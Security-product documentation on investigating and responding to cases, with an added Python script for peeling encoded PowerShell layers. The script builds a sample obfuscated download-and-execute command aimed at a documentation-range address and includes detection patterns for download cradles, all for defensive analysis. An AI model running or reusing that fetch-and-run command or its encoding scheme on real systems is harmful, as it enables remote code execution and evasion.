
Investigate cases

This page is only for "Self-managed" cases.

You can investigate a case using the information and tools on its Case details page, as described here.

We also recommend that you use our AI assistant to find out more about the detection and get suggestions for taking action. See AI assistant.

Keep a record of your investigation on the Notebook tab of the case's details page.

In some cases, you can also respond to cases. See Respond to cases.

Investigate a case

To start your investigation, do as follows:

  1. Go to the Cases page.

    Cases page.

  2. Click the Case ID of the case.

    Case ID link in Cases list.

  3. On the Overview tab, you can find information about the detection that generated the case and start your analysis using Sophos AI tools.

    Case "Overview" tab.

The Overview tab contains the following panes:

Case summary

You can use Sophos AI to generate a case summary for you.

  1. In Case Summary, click the AI icon.

    Sophos AI analyzes the case and summarizes the details.

    Case summary pane.

  2. If you want to save the summary, click Insert. To discard it, click the "X".

    If you save the summary, you can click the Edit icon and make changes to it.

    Case summary with Insert button.

Alternatively, you can summarize the case manually. Click the Edit icon and enter your summary.

Command line analysis

You can use Sophos AI to analyze the command line run by the threat that generated the case.

In Command Line, click the AI icon.

Command line analysis pane.

Sophos AI analyzes the command line to discover the threat's intentions and possible impact. If necessary, it de-obfuscates code, minimizing the effort needed to assess the threat.
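The AI output is a starting point; before acting on a decoded URL, path or host, confirm it against the raw command line. The Python script below is an added example, not Sophos code and not a description of how Sophos AI works: it peels PowerShell `-EncodedCommand` (UTF-16LE base64) and `[Convert]::FromBase64String(...)` layers from a command line, pulls URLs and IPv4 addresses out of the decoded result, and tags a few well-known ATT&CK technique IDs using pattern rules of its own. The sample command line is constructed inside the script (a download cradle pointing at a documentation-range address) and the function names and heuristics are the example's own.

```python
"""Added example (not Sophos code): manually peel an obfuscated PowerShell
command line the way an analyst would when checking the AI's reading.
The sample command line is constructed below; the heuristics are this
example's own, not Sophos AI's logic."""
import base64
import json
import re

# Real ATT&CK technique IDs; the trigger patterns are this example's own heuristics.
HEURISTICS = [
    (re.compile(r"\bpowershell(\.exe)?\b|\biex\b|invoke-expression", re.I),
     "T1059.001", "PowerShell interpreter / Invoke-Expression"),
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I),
     "T1564.003", "hidden window"),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer", re.I),
     "T1105", "download cradle"),
]
FROM_B64 = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"()<>]+", re.I)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def _b64_to_text(blob):
    """Decode a base64 blob to text, or return None if it is not valid base64.
    -EncodedCommand payloads are UTF-16LE (a NUL in every other byte);
    FromBase64String payloads are usually UTF-8, so pick the encoding from the bytes."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:
        return None
    if len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def peel_encoded_command(cmdline):
    """Return the script carried by a PowerShell -EncodedCommand flag, else None.
    PowerShell accepts -e, -ec and any unambiguous prefix of -EncodedCommand."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        flag = tok.lower().lstrip("-/")
        if flag in ("e", "ec") or (len(flag) >= 3 and "encodedcommand".startswith(flag)):
            return _b64_to_text(tokens[i + 1])
    return None


def deobfuscate(cmdline, max_layers=5):
    """Peel -EncodedCommand and FromBase64String layers; outermost layer first."""
    layers = [cmdline]
    for _ in range(max_layers):
        current = layers[-1]
        nxt = peel_encoded_command(current)
        if nxt is None:
            m = FROM_B64.search(current)
            nxt = _b64_to_text(m.group(1)) if m else None
        if nxt is None or nxt in layers:
            break
        layers.append(nxt)
    return layers


def extract_iocs(text):
    """Pull URLs and IPv4 literals out of the decoded layers."""
    return {"urls": sorted(set(URL_RE.findall(text))),
            "ipv4": sorted(set(IPV4_RE.findall(text)))}


def map_techniques(layers):
    """Tag ATT&CK technique IDs seen across all layers (technique -> reason)."""
    found = {}
    if len(layers) > 1:
        found["T1027"] = "%d base64 layer(s) decoded" % (len(layers) - 1)
    joined = "\n".join(layers)
    for pattern, tid, why in HEURISTICS:
        if pattern.search(joined):
            found[tid] = why
    return found


def analyze(cmdline):
    """Full pass: decode layers, extract indicators, map techniques."""
    layers = deobfuscate(cmdline)
    return {"layers": layers, "final_script": layers[-1],
            "iocs": extract_iocs("\n".join(layers)),
            "techniques": map_techniques(layers)}


def build_sample():
    """Constructed sample (not from a real case): a download cradle wrapped in a
    FromBase64String layer, then in an -EncodedCommand layer. 203.0.113.0/24 is
    a documentation address range."""
    stage2 = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage.ps1')"
    inner_b64 = base64.b64encode(stage2.encode("utf-8")).decode("ascii")
    stage1 = ("IEX ([Text.Encoding]::UTF8.GetString("
              "[Convert]::FromBase64String('%s')))" % inner_b64)
    outer_b64 = base64.b64encode(stage1.encode("utf-16-le")).decode("ascii")
    return "powershell.exe -NoP -W Hidden -enc " + outer_b64


SAMPLE_CMDLINE = build_sample()

if __name__ == "__main__":
    print(json.dumps(analyze(SAMPLE_CMDLINE), indent=2))
```

Run it on the command line shown in the Command Line pane (copied exactly, including the encoded blob) and compare the decoded layers and indicators with the AI analysis; a mismatch is the cue to look more closely. The layer cap in `deobfuscate` guards against samples that re-encode themselves in a loop.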

Impacted entities

Impacted Entities lists the devices, users, files, IP addresses, and processes affected by the detected threat.

Click a device name to see its full details in the Computers and servers page.

MITRE tactics

The MITRE tactics pane lists any MITRE ATT&CK tactics and techniques we detected.

Click the fold-out arrow beside a tactic to see the techniques detected under it.

Click the link beside any tactic or technique, for example Credential Access, to go to its details on the MITRE website.

MITRE tactics details.

Respond to cases

The Response Action feature is currently not available for most third-party product integrations.

For some cases, you can take response actions through third-party products.

To use this feature, you must first set up a Response Action integration with the third-party product you want to use. Go to Products and click your product to set up the integration.

Our example shows how to use a response action to suspend a compromised user. To take action, do as follows:

  1. Click the Case ID next to a case to see its details.
  2. Select the Respond tab.
  3. Find the action you want. For example, click the product type Identity to see the actions available for identity products.

    Respond tab showing Identity actions.

  4. Click Suspend User.

  5. In the action's details page, enter the required information and a reason for the action.

    Suspend User dialog.

  6. Click Run.